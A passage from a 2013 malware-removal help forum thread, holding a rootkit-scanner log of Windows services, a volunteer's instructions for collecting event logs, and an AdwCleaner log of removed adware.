08:09:11.0828 2240 [ F828DD7E1419B6653894A8F97A0094C5 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
08:09:11.0984 2240 redbook - ok
08:09:12.0015 2240 [ 7E699FF5F59B5D9DE5390E3C34C67CF5 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
08:09:12.0203 2240 RemoteAccess - ok
08:09:12.0234 2240 [ AAED593F84AFA419BBAE8572AF87CF6A ] RpcLocator C:\WINDOWS\System32\locator.exe
08:09:12.0390 2240 RpcLocator - ok
08:09:12.0406 2240 [ 6B27A5C03DFB94B4245739065431322C ] RpcSs C:\WINDOWS\System32\rpcss.dll
08:09:12.0468 2240 RpcSs - ok
08:09:12.0484 2240 [ 471B3F9741D762ABE75E9DEEA4787E47 ] RSVP C:\WINDOWS\System32\rsvp.exe
08:09:12.0671 2240 RSVP - ok
08:09:12.0718 2240 [ 2EF9C0DC26B30B2318B1FC3FAA1F0AE7 ] rtl8139 C:\WINDOWS\system32\DRIVERS\R8139n51.SYS
08:09:12.0796 2240 rtl8139 - ok
08:09:12.0812 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] SamSs C:\WINDOWS\system32\lsass.exe
08:09:12.0953 2240 SamSs - ok
08:09:13.0031 2240 [ 39763504067962108505BFF25F024345 ] SASDIFSV C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
08:09:13.0062 2240 SASDIFSV - ok
08:09:13.0093 2240 [ 77B9FC20084B48408AD3E87570EB4A85 ] SASKUTIL C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
08:09:13.0109 2240 SASKUTIL - ok
08:09:13.0156 2240 [ 86D007E7A654B9A71D1D7D856B104353 ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
08:09:13.0328 2240 SCardSvr - ok
08:09:13.0375 2240 [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA ] Schedule C:\WINDOWS\system32\schedsvc.dll
08:09:13.0531 2240 Schedule - ok
08:09:13.0562 2240 [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
08:09:13.0640 2240 Secdrv - ok
08:09:13.0687 2240 [ CBE612E2BB6A10E3563336191EDA1250 ] seclogon C:\WINDOWS\System32\seclogon.dll
08:09:13.0843 2240 seclogon - ok
08:09:13.0843 2240 [ 7FDD5D0684ECA8C1F68B4D99D124DCD0 ] SENS C:\WINDOWS\system32\sens.dll
08:09:14.0031 2240 SENS - ok
08:09:14.0093 2240 [ CCA207A8896D4C6A0C9CE29A4AE411A7 ] Serial C:\WINDOWS\system32\drivers\Serial.sys
08:09:14.0234 2240 Serial - ok
08:09:14.0265 2240 [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
08:09:14.0421 2240 Sfloppy - ok
08:09:14.0468 2240 [ 83F41D0D89645D7235C051AB1D9523AC ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
08:09:14.0625 2240 SharedAccess - ok
08:09:14.0656 2240 [ 99BC0B50F511924348BE19C7C7313BBF ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
08:09:14.0703 2240 ShellHWDetection - ok
08:09:14.0703 2240 Simbad - ok
08:09:14.0750 2240 [ 94F6EEA8A688A37F71BF9C9AEAA42666 ] SiS315 C:\WINDOWS\system32\DRIVERS\sisgrp.sys
08:09:14.0859 2240 SiS315 - ok
08:09:14.0875 2240 [ 61CA562DEF09A782D26B3E7EDEC5369A ] SISAGP C:\WINDOWS\system32\DRIVERS\SISAGPX.sys
08:09:14.0921 2240 SISAGP - ok
08:09:14.0968 2240 [ 837D26F79A1647066D75C5C811887475 ] SiSkp C:\WINDOWS\system32\DRIVERS\srvkp.sys
08:09:15.0000 2240 SiSkp - ok
08:09:15.0000 2240 Sparrow - ok
08:09:15.0046 2240 [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
08:09:15.0203 2240 splitter - ok
08:09:15.0265 2240 [ 60784F891563FB1B767F70117FC2428F ] Spooler C:\WINDOWS\system32\spoolsv.exe
08:09:15.0312 2240 Spooler - ok
08:09:15.0328 2240 [ 76BB022C2FB6902FD5BDD4F78FC13A5D ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
08:09:15.0406 2240 sr - ok
08:09:15.0453 2240 [ 3805DF0AC4296A34BA4BF93B346CC378 ] srservice C:\WINDOWS\system32\srsvc.dll
08:09:15.0546 2240 srservice - ok
08:09:15.0578 2240 [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
08:09:15.0625 2240 Srv - ok
08:09:15.0671 2240 [ 0A5679B3714EDAB99E357057EE88FCA6 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
08:09:15.0750 2240 SSDPSRV - ok
08:09:15.0781 2240 [ A9573045BAA16EAB9B1085205B82F1ED ] StillCam C:\WINDOWS\system32\DRIVERS\serscan.sys
08:09:15.0953 2240 StillCam - ok
08:09:16.0000 2240 [ 8BAD69CBAC032D4BBACFCE0306174C30 ] stisvc C:\WINDOWS\system32\wiaservc.dll
08:09:16.0187 2240 stisvc - ok
08:09:16.0218 2240 [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
08:09:16.0375 2240 swenum - ok
08:09:16.0390 2240 [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
08:09:16.0531 2240 swmidi - ok
08:09:16.0546 2240 SwPrv - ok
08:09:16.0562 2240 symc810 - ok
08:09:16.0578 2240 symc8xx - ok
08:09:16.0593 2240 sym_hi - ok
08:09:16.0593 2240 sym_u3 - ok
08:09:16.0625 2240 [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
08:09:16.0781 2240 sysaudio - ok
08:09:16.0812 2240 [ C7ABBC59B43274B1109DF6B24D617051 ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
08:09:16.0984 2240 SysmonLog - ok
08:09:17.0031 2240 [ 3CB78C17BB664637787C9A1C98F79C38 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
08:09:17.0203 2240 TapiSrv - ok
08:09:17.0250 2240 [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
08:09:17.0281 2240 Tcpip - ok
08:09:17.0312 2240 [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
08:09:17.0484 2240 TDPIPE - ok
08:09:17.0500 2240 [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
08:09:17.0656 2240 TDTCP - ok
08:09:17.0656 2240 [ 88155247177638048422893737429D9E ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
08:09:17.0828 2240 TermDD - ok
08:09:17.0875 2240 [ FF3477C03BE7201C294C35F684B3479F ] TermService C:\WINDOWS\System32\termsrv.dll
08:09:18.0062 2240 TermService - ok
08:09:18.0078 2240 [ 99BC0B50F511924348BE19C7C7313BBF ] Themes C:\WINDOWS\System32\shsvcs.dll
08:09:18.0109 2240 Themes - ok
08:09:18.0125 2240 TosIde - ok
08:09:18.0171 2240 [ 55BCA12F7F523D35CA3CB833C725F54E ] TrkWks C:\WINDOWS\system32\trkwks.dll
08:09:18.0343 2240 TrkWks - ok
08:09:18.0375 2240 [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
08:09:18.0531 2240 Udfs - ok
08:09:18.0546 2240 ultra - ok
08:09:18.0593 2240 [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
08:09:18.0765 2240 Update - ok
08:09:18.0812 2240 [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91 ] upnphost C:\WINDOWS\System32\upnphost.dll
08:09:18.0906 2240 upnphost - ok
08:09:18.0937 2240 [ 05365FB38FCA1E98F7A566AAAF5D1815 ] UPS C:\WINDOWS\System32\ups.exe
08:09:19.0093 2240 UPS - ok
08:09:19.0140 2240 [ E919708DB44ED8543A7C017953148330 ] usbaudio C:\WINDOWS\system32\drivers\usbaudio.sys
08:09:19.0328 2240 usbaudio - ok
08:09:19.0375 2240 [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
08:09:19.0515 2240 usbccgp - ok
08:09:19.0546 2240 [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
08:09:19.0703 2240 usbehci - ok
08:09:19.0718 2240 [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
08:09:19.0875 2240 usbhub - ok
08:09:19.0906 2240 [ 0DAECCE65366EA32B162F85F07C6753B ] usbohci C:\WINDOWS\system32\DRIVERS\usbohci.sys
08:09:20.0062 2240 usbohci - ok
08:09:20.0093 2240 [ A717C8721046828520C9EDF31288FC00 ] usbprint C:\WINDOWS\system32\DRIVERS\usbprint.sys
08:09:20.0250 2240 usbprint - ok
08:09:20.0281 2240 [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
08:09:20.0453 2240 usbscan - ok
08:09:20.0500 2240 [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
08:09:20.0656 2240 USBSTOR - ok
08:09:20.0671 2240 [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci C:\WINDOWS\system32\DRIVERS\usbuhci.sys
08:09:20.0812 2240 usbuhci - ok
08:09:20.0859 2240 [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
08:09:21.0015 2240 VgaSave - ok
08:09:21.0062 2240 [ 4B039BBD037B01F5DB5A144C837F283A ] viaagp1 C:\WINDOWS\system32\DRIVERS\viaagp1.sys
08:09:21.0125 2240 viaagp1 - ok
08:09:21.0156 2240 [ 0CC705DB634A3BC355887E3D478DD386 ] viagfx C:\WINDOWS\system32\DRIVERS\vtmini.sys
08:09:21.0187 2240 viagfx - ok
08:09:21.0218 2240 [ 3B3EFCDA263B8AC14FDF9CBDD0791B2E ] ViaIde C:\WINDOWS\system32\DRIVERS\viaide.sys
08:09:21.0343 2240 ViaIde - ok
08:09:21.0375 2240 [ 4C8FCB5CC53AAB716D810740FE59D025 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
08:09:21.0531 2240 VolSnap - ok
08:09:21.0562 2240 [ 7A9DB3A67C333BF0BD42E42B8596854B ] VSS C:\WINDOWS\System32\vssvc.exe
08:09:21.0671 2240 VSS - ok
08:09:21.0718 2240 [ 54AF4B1D5459500EF0937F6D33B1914F ] W32Time C:\WINDOWS\system32\w32time.dll
08:09:21.0875 2240 W32Time - ok
08:09:21.0906 2240 [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
08:09:22.0062 2240 Wanarp - ok
08:09:22.0062 2240 WDICA - ok
08:09:22.0093 2240 [ 6768ACF64B18196494413695F0C3A00F ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
08:09:22.0234 2240 wdmaud - ok
08:09:22.0296 2240 [ 77A354E28153AD2D5E120A5A8687BC06 ] WebClient C:\WINDOWS\System32\webclnt.dll
08:09:22.0453 2240 WebClient - ok
08:09:22.0546 2240 [ F45DD1E1365D857DD08BC23563370D0E ] WinDefend C:\Program Files\Windows Defender\MsMpEng.exe
08:09:22.0562 2240 WinDefend - ok
08:09:22.0640 2240 [ 2D0E4ED081963804CCC196A0929275B5 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
08:09:22.0781 2240 winmgmt - ok
08:09:22.0843 2240 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
08:09:22.0890 2240 WmdmPmSN - ok
08:09:22.0937 2240 [ E0673F1106E62A68D2257E376079F821 ] WmiApSrv C:\WINDOWS\System32\wbem\wmiapsrv.exe
08:09:23.0093 2240 WmiApSrv - ok
08:09:23.0187 2240 [ F74E3D9A7FA9556C3BBB14D4E5E63D3B ] WMPNetworkSvc C:\Program Files\Windows Media Player\WMPNetwk.exe
08:09:23.0234 2240 WMPNetworkSvc - ok
08:09:23.0281 2240 [ CF4DEF1BF66F06964DC0D91844239104 ] WpdUsb C:\WINDOWS\system32\DRIVERS\wpdusb.sys
08:09:23.0312 2240 WpdUsb - ok
08:09:23.0359 2240 [ 6ABE6E225ADB5A751622A9CC3BC19CE8 ] WS2IFSL C:\WINDOWS\System32\drivers\ws2ifsl.sys
08:09:23.0500 2240 WS2IFSL - ok
08:09:23.0546 2240 [ 7C278E6408D1DCE642230C0585A854D5 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
08:09:23.0734 2240 wscsvc - ok
08:09:23.0781 2240 [ 35321FB577CDC98CE3EB3A3EB9E4610A ] wuauserv C:\WINDOWS\system32\wuauserv.dll
08:09:23.0937 2240 wuauserv - ok
08:09:23.0984 2240 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
08:09:24.0031 2240 WudfPf - ok
08:09:24.0062 2240 [ 28B524262BCE6DE1F7EF9F510BA3985B ] WudfRd C:\WINDOWS\system32\DRIVERS\wudfrd.sys
08:09:24.0093 2240 WudfRd - ok
08:09:24.0125 2240 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
08:09:24.0187 2240 WudfSvc - ok
08:09:24.0250 2240 [ 81DC3F549F44B1C1FFF022DEC9ECF30B ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
08:09:24.0468 2240 WZCSVC - ok
08:09:24.0500 2240 [ 295D21F14C335B53CB8154E5B1F892B9 ] xmlprov C:\WINDOWS\System32\xmlprov.dll
08:09:24.0703 2240 xmlprov - ok
08:09:24.0718 2240 ================ Scan global ===============================
08:09:24.0750 2240 [ 42F1F4C0AFB08410E5F02D4B13EBB623 ] C:\WINDOWS\system32\basesrv.dll
08:09:24.0796 2240 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
08:09:24.0828 2240 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
08:09:24.0859 2240 [ 65DF52F5B8B6E9BBD183505225C37315 ] C:\WINDOWS\system32\services.exe
08:09:24.0875 2240 [Global] - ok
08:09:24.0875 2240 ================ Scan MBR ==================================
08:09:24.0890 2240 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
08:09:25.0125 2240 \Device\Harddisk0\DR0 - ok
08:09:25.0125 2240 ================ Scan VBR ==================================
08:09:25.0125 2240 [ 29EED5D12AE78A897E7DAAD5F2670E2C ] \Device\Harddisk0\DR0\Partition1
08:09:25.0140 2240 \Device\Harddisk0\DR0\Partition1 - ok
08:09:25.0140 2240 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
08:09:25.0140 2240 \Device\Harddisk0\DR0\Partition2 - ok
08:09:25.0140 2240 ============================================================
08:09:25.0140 2240 Scan finished
08:09:25.0140 2240 ============================================================
08:09:25.0250 2372 Detected object count: 12
08:09:25.0250 2372 Actual detected object count: 12
08:09:48.0093 2372 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 hpqcxs08 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 hpqcxs08 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 hpqddsvc ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 hpqddsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 Iviaspi ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 Iviaspi ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 McciCMService ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 McciCMService ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MREMP50 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MREMP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MREMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MREMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MRENDIS5 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MRENDIS5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MRESP50 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MRESP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 Pfc ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 Pfc ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0125 2372 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0125 2372 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip

#14
RKinner

Posted 19 January 2013 - 09:10 AM

Malware Expert

Expert
24,624 posts

After you do the stuff in my last post let's check if worked:

Right click on (My) Computer and select Manage (Continue) Then the Event Viewer. Next select Windows Logs. Right click on System and Clear Log, Clear. Repeat for Application.

Reboot.

1. Please download the Event Viewer Tool by Vino Rosso
http://images.malwar...om/vino/VEW.exe
and save it to your Desktop:
2. Right-click VEW.exe and Run AS Administrator
3. Under 'Select log to query', select:

* System
4. Under 'Select type to list', select:
* Error
* Warning

Then use the 'Number of events' as follows:

1. Click the radio button for 'Number of events'
Type 20 in the 1 to 20 box
Then click the Run button.
Notepad will open with the output log.

Please post the Output log in your next reply then repeat but select Application.

Ron

#15
goodseed

Posted 19 January 2013 - 09:38 AM

Member

Topic Starter
Member
49 posts

# AdwCleaner v2.106 - Logfile created 01/19/2013 at 09:31:43
# Updated 17/01/2013 by Xplode
# Operating system : Microsoft Windows XP Service Pack 3 (32 bits)
# User : Owner - YOUR-46E94OWX6A
# Boot Mode : Normal
# Running from : C:\Documents and Settings\Owner\My Documents\Downloads\adwcleaner.exe
# Option [Delete]

***** [Services] *****

***** [Files / Folders] *****

Deleted on reboot : C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho
Folder Deleted : C:\Documents and Settings\Administrator.YOUR-46E94OWX6A\Application Data\Mozilla\Firefox\Profiles\0yoa5veo.default\extensions\[email protected]
Folder Deleted : C:\Documents and Settings\All Users\Application Data\InstallMate
Folder Deleted : C:\Documents and Settings\All Users\Application Data\Premium
Folder Deleted : C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]

***** [Registry] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho
Key Deleted : HKLM\Software\ImInstaller
Key Deleted : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094
Key Deleted : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536

***** [Internet Browsers] *****

-\\ Internet Explorer v8.0.6001.18702

[OK] Registry is clean.

-\\ Mozilla Firefox v18.0.1 (en-US)

File : C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\prefs.js

C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\user.js ... Deleted !

Deleted : user_pref("browser.newtabpage.blocked", "{\"h0aMB8AuNw74TUt+OmaFiQ==\":1,\"7Rc8ejXzptvtSL7bDmf7dw==\[...]

File : C:\Documents and Settings\Administrator.YOUR-46E94OWX6A\Application Data\Mozilla\Firefox\Profiles\0yoa5veo.default\prefs.js

Deleted : user_pref("extensions.crossriderapp435.adsOldValue", -1);

-\\ Google Chrome v24.0.1312.52

File : C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences

[OK] File is clean.

*************************

AdwCleaner[S1].txt - [2364 octets] - [19/01/2013 09:31:43]

########## EOF - C:\AdwCleaner[S1].txt - [2424 octets] ##########